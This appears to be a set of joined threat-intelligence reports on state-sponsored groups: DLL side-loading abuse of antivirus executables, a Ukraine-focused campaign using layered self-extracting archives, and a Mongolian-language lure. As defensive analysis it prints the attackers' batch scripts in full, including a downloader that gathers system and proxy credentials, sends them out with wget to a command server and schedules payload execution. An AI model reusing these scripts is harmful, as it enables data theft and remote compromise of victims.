“360软件管家(360 Software Manager)” is a famous software management program in China.

They set the file name of their malicious DLL to be “dbghelp.dll” and deploy it in the same path along with the renamed normal “SoftManager.exe” file. When the victim executes this renamed “SoftManager.exe”, the malicious “dbghelp.dll” file is loaded and malware is executed.

Side Load 12 – Neuber Software Typograf font manager (FontSets.exe)

The SectorF01 group used the normal “FontSets.exe” (Neuber Software Typograf font manager) to utilize the “DLL Side-Loading” technique. The normal “FontSets.exe” file loads a “FaultRep.dll” DLL file.

“Neuber Software Typograf font manager” is a famous font management program.

“FontSets.exe” loads the “FaultRep.dll” file from the same path as the program executed according to the DLL load order of Windows DLLs, before the file is loaded from the Windows system folder.

The following shows the code in “FontSets.exe” that loads the “FaultRep.dll” DLL.

They set the file name of their malicious DLL to be “FaultRep.dll” and deploy it in the same path along with the renamed normal “FontSets.exe” file. When the victim executes this renamed “FontSets.exe”, the malicious “FaultRep.dll” file is loaded and malware is executed.

Side Load 13 – McAfee VirusScan On-Demand Scan (mcods.exe)

The SectorF01 group used the normal “mcods.exe” (McAfee VirusScan On-Demand Scan) to utilize the “DLL Side-Loading” technique. The normal “mcods.exe” file loads a “McVsoCfg.dll” DLL file.

The SectorF01 group utilized normal files of Anti-Virus programs and exploited the fact that these files are usually whitelisted by other security products and that their behavior might be exempted from monitoring.

The normal “mcods.exe” file loads a “McVsoCfg.dll” DLL file.

“McVsoCfg .dll” is loaded and the Export API function “McVsoCfgGetObject” is called. The “McVsoCfgGetObject” function in “McVsoCfg.dll” contains the malicious code.

They set the file name of their malicious DLL to be “McVsoCfg.dll” and deploy it in the same path along with the renamed normal “mcods.exe” file. When the victim executes this renamed “mcods.exe”, the malicious “McVsoCfg.dll” file is loaded and malware is executed.

Side Load 14 – McAfee Oem Module (mcoemcpy.exe)

The SectorF01 group used the normal “mcoemcpy.exe” (McAfee Oem Module) to utilize the “DLL Side-Loading” technique. The normal “mcoemcpy.exe” file loads a “McUtil.dll” DLL file.

They set the file name of their malicious DLL to be “McUtil.dll” and deploy it in the same path along with the renamed normal “mcoemcpy.exe” file. When the victim executes this renamed “mcoemcpy.exe”, the malicious “McUtil.dll” file is loaded and malware is executed.

Side Load 15 – Symantec Network Access Control (rastlsc.exe)

The SectorF01 group used the normal “rastlsc.exe” (Symantec Network Access Control) to utilize the “DLL Side-Loading” technique. The normal “rastlsc.exe” file loads a “RasTls.dll” DLL file.

They set the file name of their malicious DLL to be “RasTls.dll” and deploy it in the same path along with the renamed normal “rastlsc.exe” file. When the victim executes this renamed “rastlsc.exe”, the malicious “RasTls.dll” file is loaded and malware is executed.

Side Load 16 – Kaspersky Anti-Virus Installation assistant host (avpia.exe)

The SectorF01 group used the normal “avpia.exe” (Kaspersky Anti-Virus Installation Assistant host) to utilize the “DLL Side-Loading” technique. The normal “avpia.exe” file loads a “product_info.dll” DLL file.

They set the file name of their malicious DLL to be “product_info.dll” and deploy it in the same path along with the renamed normal “avpia.exe” file. When the victim executes this renamed “avpia.exe”, the malicious “product_info.dll” file is loaded and malware is executed.

Side Load 17 – Kaspersky Light Plugin Extension Registrar (plugins-setup.exe)

The SectorF01 group used the normal “plugins-setup.exe” (Kaspersky Light Plugin Extension Registrar) to utilize the “DLL Side-Loading” technique. The normal “plugins-setup.exe” file loads a “product_info.dll” DLL file.

They set the file name of their malicious DLL to be “product_info.dll” and deploy it in the same path along with the renamed normal “plugins-setup.exe” file. When the victim executes this renamed “plugins-setup.exe”, the malicious “product_info.dll” file is loaded and malware is executed.

Side Load 18 – Avast Antivirus remediation (wsc_proxy.exe)

The SectorF01 group used the normal “wsc_proxy.exe” (Avast Antivirus remediation) to utilize the “DLL Side-Loading” technique. The normal “wsc_proxy” file loads a “wsc.dll” DLL file.

They set the file name of their malicious DLL to be “wsc.dll” and deploy it in the same path along with the renamed normal “wsc_proxy.exe” file. When the victim executes this renamed “wsc_proxy.exe”, the malicious “wsc.dll” file is loaded and malware is executed.

The lures related to South Korea

The SectorF01 group used more than 800 malwares for about seven years and used keywords related to various countries. We will summarize the attacks that contain keywords related to South Korea among those malwares. They mainly attacked countries in Southeast Asia; however, a Japanese automobile company, one of the East Asian countries, is likely to have been attacked by the SectorF01 group recently as well, and similar malware have been found at a similar time, which we suspect to be related to a South Korean automobile company.

We cannot be sure that this attack was carried out on South Korea just because it contained keywords related to South Korea. However, the SectorF01 group is using subjects related to South Korea in their attack, and it is possible that the attack was directly or indirectly related to South Korea. The SectorF01 group has carried out a number of attacks against foreign companies that have entered Vietnam, and so there is a possibility that South Korean companies may be targeted.

Lure 1 – Hyundai Thành Công

There is one malware that the SectorF01 group used in January 2019 to attack specific targets using the “DLL Side-Loading” technique. The file name of the malware used in this attack is “Ho so dang ky lam dai ly uy quyen chinh thuc cua Huyndai – Thanh Cong – Nguyen Thi Mai Phuong.exe”. “Huyndai” in the file name is likely to be a typo of “Hyundai”. “Hyundai – Thanh Cong (Hyundai Thành Công)” is a joint venture established by a South Korean automobile company in cooperation with a large Vietnamese company.

Malware distributed using the subject of “Huyndai [sic] – Thanh Cong”

Both “wwlib.dll” and the following normal document are executed, causing the user to believe that the document is executed as per normal, without loading any executable file.

Normal document executed by “wwlib.dll”

Lure 2 – Cambodia National Rescue Party in Republic of Korea

There is a malicious document called “FW Report on demonstration of former CNRP in Republic of Korea.doc” that the SectorF01 group used to attack using “CVE-2017-11882” vulnerability in July 2018. “CNRP” in the file name is likely to be an abbreviation of “Cambodia National Rescue Party”, and there are many supporters of the Cambodia National Rescue Party (CNRP) in South Korea. Indeed, in April 2019, thousands of CNRP supporters gathered in Gwangju, South Korea, to protest the liberation of democracy in Cambodia.

“CNRP” supporters’ demonstrations in Gwangju,Korea, The Phnom Penh Post

When executing the document, the malware is executed by the vulnerability “CVE-2017-11882”. The following screen is displayed when the document is viewed.

“FW Report on demonstration of former CNRP in Republic of Korea.doc” document

Lure 3 – KoreanTimesSSK Font

The SectorF01 group attacked using fonts as lure subjects and pretends to be a font management program or font file. They seem to utilize font-related programs in attacks because most of the countries that the group attacks have a non-English native language and they have to use various fonts accordingly. The SectorF01 group used a file disguised as a Korean font in June 2017, and the “KoreanTimesSSK” font used in the attack was a Korean font created by Southern Software.


We have traced the SectorF01 group, which has been steadily conducting cyber espionage activities in Southeast Asia for the past seven years, and examined their initial penetration methods. They conduct hacking activities against neighboring countries and opposition forces in order to maintain their own regime and economic profit. It is likely that it is hacking at the national level for the benefit of the state and recently also hacking other industries such as the automobile industries of more advanced countries to contribute to the industrial development of their own country. These attacks are spreading to the East Asian region, which is a huge threat to the neighboring countries as well as to the national institutions.

The scope of activities and number of malware that the group uses every year for attacks is increasing, and we need to understand them more and prepare for their attacks. We should be prepared to effectively detect and respond to their attacks through steady threat hunting and intelligence activities.

Indicators of Compromise

The IOCs containing the malware hashes (827 total) that the SectorF01 group used from 2013 until end of the June 2019 for cyber espionage can be found here.

More information about the SectorF01 group is available to customers of ThreatRecon Intelligence Service (

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

Drive-by Compromise
Exploit Public-Facing Application
Spearphishing Attachment
Spearphishing Link
Valid Accounts


Command-Line Interface
Compiled HTML File
Control Panel Items
Execution through API
Execution through Module Load
Exploitation for Client Execution
Scheduled Task
Service Execution
Signed Script Proxy Execution
Trusted Developer Utilities
User Execution
Windows Management Instrumentation


Component Object Model Hijacking
DLL Search Order Hijacking
Hidden Files and Directories
Modify Existing Service
New Service
Office Application Startup
Registry Run Keys / Startup Folder
Scheduled Task
Valid Accounts
Web Shell

Privilege Escalation

Bypass User Account Control
DLL Search Order Hijacking
Exploitation for Privilege Escalation
New Service
Process Injection
Scheduled Task
Valid Accounts
Web Shell

Defense Evasion

Binary Padding
Bypass User Account Control
Compiled HTML File
Component Object Model Hijacking
Control Panel Items
Deobfuscate/Decode Files or Information
DLL Search Order Hijacking
DLL Side-Loading
File Deletion
File Permissions Modification
Hidden Files and Directories
Indicator Removal on Host
Modify Registry
NTFS File Attributes
Obfuscated Files or Information
Process Injection
Signed Script Proxy Execution
Software Packing
Template Injection
Trusted Developer Utilities
Valid Accounts
Virtualization/Sandbox Evasion
Web Service

Credential Access

Credential Dumping
Input Capture
Network Sniffing


Account Discovery
File and Directory Discovery
Network Service Scanning
Network Sniffing
Process Discovery
Query Registry
Remote System Discovery
System Information Discovery
System Network Configuration Discovery
System Network Connections Discovery
System Owner/User Discovery
Virtualization/Sandbox Evasion

Lateral Movement

Application Deployment Software
Distributed Component Object Model
Exploitation of Remote Services
Pass the Hash
Pass the Ticket
Remote File Copy
Windows Admin Shares


Automated Collection
Data from Local System
Input Capture
Man in the Browser
Screen Capture

Command and Control

Commonly Used Port
Custom Command and Control Protocol
Data Encoding
Data Obfuscation
Domain Generation Algorithms
Multi-Stage Channels
Multiband Communication
Remote File Copy
Standard Application Layer Protocol
Uncommonly Used Port
Web Service


Data Compressed
Data Encrypted
Exfiltration Over Alternative Protocol
Exfiltration Over Command and Control Channel


Transmitted Data Manipulation

SectorC08: Multi-Layered SFX in Recent Campaigns Target Ukraine


Unlike other state sponsored threat actors, SectorC08 appears to be only concerned with a single target: Ukraine. Artifacts of their likely activity have been found as far back as 2013 and up till today their modus operandi in their initial stages of operation has not changed much.

We analyzed over 50 of their executable malware files found very recently in order to look at similarities, differences, and outliers. We found that while a few samples still used SectorC08’s executable file structure which contained batch scripts which were split out into many files (e.g. Wariables.cmd) or batch scripts together with a decoder executable and an encoded executable, most of them followed the structure we will be detailing below.

Example of a Typical First Stage Structure (a8f849d536481d7d8a0fa59a7bcc03dd3387ab4cc14c0342371ae295817f505c)

All samples which we can confirm came in the months of May and June used the same structure in their malware which we will be describing below: a 7zSFX archive which opens a password protected WinRARSFX archive, which then attempts to use a version of wget to download its third stage malware which is another WinRARSFX archive such as UltraVNC.

Fake Documents

Some of the malware samples we found contained an embedded fake document in them pertaining to Ukrainian issues. We observed six such embedded fake documents which were sometimes reused against different targets. These documents are opened from the embedded batch file in the 7zSFX archive environment.

Example of files embedded in a 7zSFX archive. “6710” is the embedded fake document here.

The batch file is always the file which SectorC08 set to be ran after the 7zSFX archive is executed, and the way the file distracts the victim while it performs its malicious activity is to open up a fake document from that batch file.

<18974.cmd> – Commands Related to Opening Fake Document
… set CHeqCJB=Document … set EhFWXVK=6710 … copy /y “%EhFWXVK%” “%CHeqCJB%.docx” … “%CD%\%CHeqCJB%.docx” …

The fake documents are always in Ukrainian and pertain to Ukrainian issues such as legal, political, military or police issues.

By comparing the document content date to the malware internal versioning code (described later) and from our knowledge of the malware’s previous versioning codes and dates, we can conclude that when the malware internal versioning code corresponds to a date, it is at least a roughly accurate timestamp and we can create a partial timeline of events.

For example, the fake military document dated 21st May 2019 was found in three separate malware samples, where the version code “21.05” (21st May) appeared twice and “22.05” (22nd May) appeared once. Another example is the undated fake police message where the version code “24.05” (24th May) appeared thrice and “prok” and “27” appeared once each.

Basic Anti-Analysis

At the start of this batch script, the malware looks for Wireshark and Process Explorer using the TaskList command. If any of these exist, the script exits using an unspecified label “exit”. But due to an error in their programming logic, this does not actually do everything which the attacker thinks it does.

<18974.cmd> – Basic Anti-Analysis
… For %%g In (wireshark procexp) do ( TaskList /FI “ImageName EQ %%g.exe” | Find /I “%%g.exe” ) If %ErrorLevel% NEQ 1 goto exit …

While looking for Wireshark and Process Explorer were consistent across their malware samples, we also found singular instances where the malware was also checking for HttpAnalyzer (9dbc77844fc3ff3565970cb09d629a710fdec3065b6e4c37b20a889c716c53bf) and an old different malware family sample of SectorC08’s which also checked whether the machine’s username was a known sandbox username such as “TEQUILABOOMBOOM” or “MALWARETEST” (034fed63fc366ff3cf0137caced77a046178926c63faf1a8cd8db9d185d40821).

<statecrypt.cmd> – Checking for usernames such as “TEQUILABOOMBOOM”
… Set ProcessName=wireshark.exe TaskList /FI “ImageName EQ %ProcessName%” | Find /I “%ProcessName%” If %ErrorLevel% NEQ 1 goto hotlog set name=%username% if “%name%”==”MALTEST” goto hotlog if “%name%”==”MALWARETEST” goto hotlog if “%name%”==”TEQUILABOOMBOOM” goto hotlog if “%name%”==”SANDBOX” goto hotlog if “%name%”==”VIRUS” goto hotlog if “%name%”==”MALWARE” goto hotlog if “%name%”==”MALWARES” goto hotlog if “%name%”==”TEST” goto hotlog if “%name%”==”TROYAN” goto hotlog … :hotlog ping taskkill /f /im mshta.exe for /r “%TEMP%” %%d in (.) do dir /b “%%~d” | find /v “”>nul || rd /s /q “%%~d” del /f /q “%CD%\*.vbs” del /f /q “%CD%\*.exe” del /f /q “%CD%\*.cmd” exit

First Stage Persistence

In this sample, the first stage 7zSFX archive contains the first stage batch script (filename: “18974.cmd”), a shortcut link to run “%USERPROFILE%\winver.exe -pgblfhsuyjqyst” (filename: “11666”), the fake document (6710), and the second stage WinRARSFX archive (filename: “5610”). In the first stage batch script, we can see that the second stage executable is getting renamed and moved to “%USERPROFILE%\winver.exe”, then the shortcut file is being moved to “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winver.lnk” for persistence.

<18974.cmd> – Commands Related to Persistence
… set KsEEKky=”%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\” … set “EbnMNIJ=%USERPROFILE%” … set UDWwujG=winver … set GLUymyw=5610 … copy /y “%GLUymyw%” “%EbnMNIJ%\%UDWwujG%.exe” … copy /y “11666” %KsEEKky%\%UDWwujG%.lnk …

Sample Second Stage (EE623D8FCF366249A381B0CB50CE6295E913F88CB0F9CB4D8116C0F3D9FA16F2)

In many recent cases, their second stage is a password protected WinRARSFX which contains a VBS file whose only purpose is to run batch commands via WScript, a .cmd batch file containing the commands to be ran, and a renamed version of wget.

The second stage WinRARSFX archive

In this example, we see that the password used to open the second stage is “uyjqystgblfhs”. While SectorC08 sometimes changes the WinRARSFX password (or simply uses another 7zSFX unprotected archive), we observed this particular password being used at least 11 times across their various malware samples. This shows that while they have likely automated parts of their process for building these batch scripts, a lot of it is still completely manual.

<18974.cmd> – Commands Related to Second Stage Password
… set “EbnMNIJ=%USERPROFILE%” … set UDWwujG=winver … set GLUymyw=5610 … set cjhIZDS=uyjqystgblfhs … taskkill /f /im %UDWwujG%.exe … copy /y “%GLUymyw%” “%EbnMNIJ%\%UDWwujG%.exe” … start “” %EbnMNIJ%\%UDWwujG%.exe -p%cjhIZDS% …

Second Stage Persistence and Wget

After the first stage, the 7zSFX archive always eventually acts as a downloader in the second stage, launching various versions of wget in order to download its third stage.

<11009.cmd> – Full Contents
@echo off if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% chcp 1251>NUL set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn setlocal enabledelayedexpansion if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set “qwoMlMx=HKCU\Software” set SbTrL=%SgJyn%*whAWq-%atpVW% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set “CnGKehh=Microsoft\Windows” set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set SbTrL=%SgJyn%*whAWq-%atpVW% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq set “XCEEJVi=CurrentVersion\Internet Settings” if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set GMXXMeP=”%qwoMlMx%\%CnGKehh%\%XCEEJVi%” set SbTrL=%SgJyn%*whAWq-%atpVW% if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn For /F “UseBackQ Tokens=2*” %%n In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyServer”`) do set BtRtCGM=%%o if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% For /F “UseBackQ Tokens=2*” %%u In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyUser”`) do set tBUCICm=%%v if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq For /F “UseBackQ Tokens=2*” %%n In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyPass”`) do set BwtKgWA=%%o set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set SbTrL=%SgJyn%*whAWq-%atpVW% For /F “skip=1 Tokens=4*” %%u In (‘vol c:’) Do set KsEEKky=%%u if %KsEEKky%==is ( For /F “skip=1 Tokens=5*” %%v In (‘vol c:’) Do set KsEEKky=%%v ) if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set EbnMNIJ=22.05 set SbTrL=%SgJyn%*whAWq-%atpVW% set per_24=%computername% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set DOHVFwJ=0 if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq set SbTrL=%SgJyn%*whAWq-%atpVW% systeminfo > UDWwujG if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq FOR /F “tokens=*” %%n IN (UDWwujG) do @IF NOT i%%n==i set CHeqCJB=!CHeqCJB!%%n+### set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set SbTrL=%SgJyn%*whAWq-%atpVW% if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set NFJOtqt=%computername%_%KsEEKky:-=% set SbTrL=%SgJyn%*whAWq-%atpVW% set eNSzFCv=http if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq set SbTrL=%SgJyn%*whAWq-%atpVW% if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn set FbNZKeg=wincreator set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn set if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set EhFWXVK=%eNSzFCv%://%FbNZKeg%.%HIngDXg% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=%SgJyn%*whAWq-%atpVW% set GLUymyw=jasfix set SbTrL=%SgJyn%*whAWq-%atpVW% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set “cjhIZDS=%APPDATA%\Microsoft\IE” if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set ViKDbBD=MicrosoftCreate if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=%SgJyn%*whAWq-%atpVW% set BDwSMJD=weristotal if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set NOdKmih=winusers if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn set flkpgez=bitvers set per_23=”Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64″ if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq MD “%cjhIZDS%” if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% copy “%ViKDbBD%.exe” “%cjhIZDS%\%BDwSMJD%.exe” /y set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq schtasks /Create /SC MINUTE /MO 30 /F /tn %BDwSMJD%_%KsEEKky:-=%_01 /tr “%cjhIZDS%\%BDwSMJD%.exe -b -c -t 5 ‘%eNSzFCv%://%flkpgez%.%HIngDXg%/%NFJOtqt%/%NOdKmih%.exe’ -P ‘%USERPROFILE%'” set SbTrL=%SgJyn%*whAWq-%atpVW% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% schtasks /Create /SC MINUTE /MO 32 /F /tn %BDwSMJD%_%KsEEKky:-=%_02 /tr “%USERPROFILE%\%NOdKmih%.exe” if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if defined BtRtCGM ( schtasks /Create /SC MINUTE /MO 31 /F /tn %BDwSMJD%_%KsEEKky:-=%_03 /tr “%cjhIZDS%\%BDwSMJD%.exe -e http_proxy=http://%BtRtCGM% –proxy-user=%tBUCICm% –proxy-password=%BwtKgWA% -b -c -t 3 ‘%eNSzFCv%://%flkpgez%.%HIngDXg%/%NFJOtqt%/%NOdKmih%.exe’ -P ‘%USERPROFILE%'” ) if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% :KTmZDZR set SbTrL=%SgJyn%*whAWq-%atpVW% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set /a xTBHxRg=39*%RANDOM%/32768 if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% ping -n 10 if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn timeout /t %xTBHxRg% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% taskkill /f /im %ViKDbBD%.exe if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn set SbTrL=%SgJyn%*whAWq-%atpVW% %ViKDbBD%.exe –user-agent=%per_23% –post-data=”versiya=%EbnMNIJ: =%&comp=%per_24%&id=%NFJOtqt: =%&sysinfo=%CHeqCJB%” “%EhFWXVK%” -q -N %EhFWXVK% -O %GLUymyw%.exe set SbTrL=%SgJyn%*whAWq-%atpVW% if defined BtRtCGM ( %ViKDbBD%.exe –user-agent=%per_23% -e http_proxy=http://%BtRtCGM% –proxy-user=%tBUCICm% –proxy-password=%BwtKgWA% –post-data=”versiya=%EbnMNIJ: =%&comp=%per_24%&id=%NFJOtqt: =%&sysinfo=%CHeqCJB%” “%EhFWXVK%” -q -N %EhFWXVK% -O %GLUymyw%.exe ) ping -n 5 if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set /a zDGBFmh=0 set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% for %%o in (%GLUymyw%.exe) do (set /a zDGBFmh=%%~Zo) if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq if %zDGBFmh% GEQ 50002 call :FdLHKss set SbTrL=%SgJyn%*whAWq-%atpVW% set /a xTBHxRg=30*%RANDOM%/32768 if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% ping -n 5 set SbTrL=%SgJyn%*whAWq-%atpVW% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% goto KTmZDZR if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% :FdLHKss start “” “%GLUymyw%.exe” if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn ping -n 11 set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% del /q /f “%GLUymyw%.exe” if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq exit /b set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%

From the sample contents below, we can see that MicrosoftCreate.exe (some version of wget) is being renamed and moved to “%APPDATA%\Microsoft\IE\weristotal.exe”. This weristotal.exe is then set to download an EXE file from hxxp://bitvers[.]ddns[.]net/<computerinfo>/winusers.exe in a scheduled task which is then executed in another scheduled task. The scheduled task to perform the download happens every 30 minutes, and this is important to note because SectorC08’s servers very often returns a HTTP 403 Forbidden error instead of the requested file.

Separately, the original MicrosoftCreate.exe also attempts to download another executable, jasfix.exe in this case, from hxxp://wincreator[.]ddns[.]net/<computerinfo>/winusers.exe. While both of these wget downloads are to different DDNS servers, both servers point to the same IP addresses and the same file paths, meaning that it is also a form of redundancy for SectorC08.

In order to identify victims, fields sent in the wget command include the “comp” field (containing %computername% environment variable) and the “sysinfo” field (containing the entire contents of the systeminfo command). All of these are sent in the clear using HTTP.

Another interesting area to note from how they run wget is the user-agent used and the “versiya” (version) field in the post-data. While the user-agent is left as the default wget user agent about half the time, at other times various and even unusual user-agent strings are used which suggests that SectorC08 sometimes knows which user-agent strings are used or likely to be used in the victim environment.

Version CodeUser-Agent
07.05Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36
13.05Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
13.05Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) Safari/604.1
21.05 Mozilla/5.0 (Linux; Android 5.1; Neffos C5 Build/LMY47D) Mobile Safari/537.36
21.05Mozilla/5.0 (X11; Linux x86_64) Safari/537.36
23.05Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
23.05 Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64
24.05 Mozilla/5.0 (Linux; Android 8.0.0; SM-G955F Build/R16NW) Safari/537.36
24.05 Mozilla/5.0 (Windows NT 5.1) Chrome/49.0.2623.112
U_04 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
USB_04Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
USB_07 Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
USB_08Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64
osb Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36

Additionally, if a proxy is defined at “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings” with the registry keys “ProxyServer”, “ProxyUser”, and “ProxyPass”, these values will be used in the wget “http_proxy”, “–proxy-user”, and “–proxy-password” fields in another invocation of wget.

In total we observed six different versions of wget being used by SectorC08 recently, which are what appears to be different variations of GNU Wget 1.11.4 and GNU Wget 1.16.

Stage 3 and 4 – UltraVNC

The file downloaded by wget is actually the stage 3 binary, another 7zSFX archive but this time containing a password protected WinRARSFX archive which uses UltraVNC for remote administration. In fact, using UltraVNC for unauthorized remote administration has been a tactic which SectorC08 has been using for many years.


SectorC08 is a threat group interested in targeting Ukraine and has been doing so for many years. While their tactics have not changed much even after so long, that only goes to show that they have achieved at least some success in their operations over the years. From a technical standpoint, their custom malware might appear to some as unsophisticated due to the low technical difficulty in creating these malware samples, but in fact due to their creative use of various versions of open source utilities and modifying a lot of static information such as the 7zSFX and WinRARSFX versions used to create their executables and even the icons of every file, they have consistently achieved low detections from security products and are likely to continue to do so.

Indicators of Compromise

Hashes (SHA-256)


wget utilities (SHA-256)


Embedded Lure Documents


Domain Names


IP Addresses


MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

T1091 Replication Through Removable Media
T1193 Spearphishing Attachment


T1059 Command-Line Interface
T1085 Rundll32
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution
T1047 Windows Management Instrumentation


T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task
T1023 Shortcut Modification

Defense Evasion

T1158 Hidden Files and Directories
T1036 Masquerading
T1085 Rundll32
T1064 Scripting
T1027 Obfuscated Files or Information


T1057 Process Discovery
T1012 Query Registry
T1082 System Information Discovery
T1016 System Network Configuration Discovery
T1124 System Time Discovery
T1497 Virtualization/Sandbox Evasion

Command and Control

T1043 Commonly Used Port
T1065 Uncommonly Used Port
T1219 Remote Access Tools
T1071 Standard Application Layer Protocol

SectorB06 using Mongolian language in lure document


SectorB06 is a state sponsored threat actor group active especially within Asia. They have been exploiting vulnerabilities in Microsoft Office’s Equation Editor [1] which Microsoft removed in January 2018 [2], which in this case seems to be a highly obfuscated version of CVE-2017-11882. The malware we analyzed in this case are sent seemingly only after they already have a basic foothold in their target organizations.

We came across multiple pieces of their malware used in 2019 which appears to be custom compiled on a per target victim per organization basis, with this particular decoy document being uploaded from a Singapore IP address.

Decoy RTF Document

In this example, SectorB06 made use of a Mongolian decoy document to target their victim.

Decoy document written in Mongolian which references the Ministry of Justice and Internal Affairs of Mongolia

If exploitable, the exploit code drops the first-stage malware DLL at “%APPDATA%\Microsoft\Word\STARTUP\cclerr.wll” and runs it.

First Stage Malware (RasTls.dll)

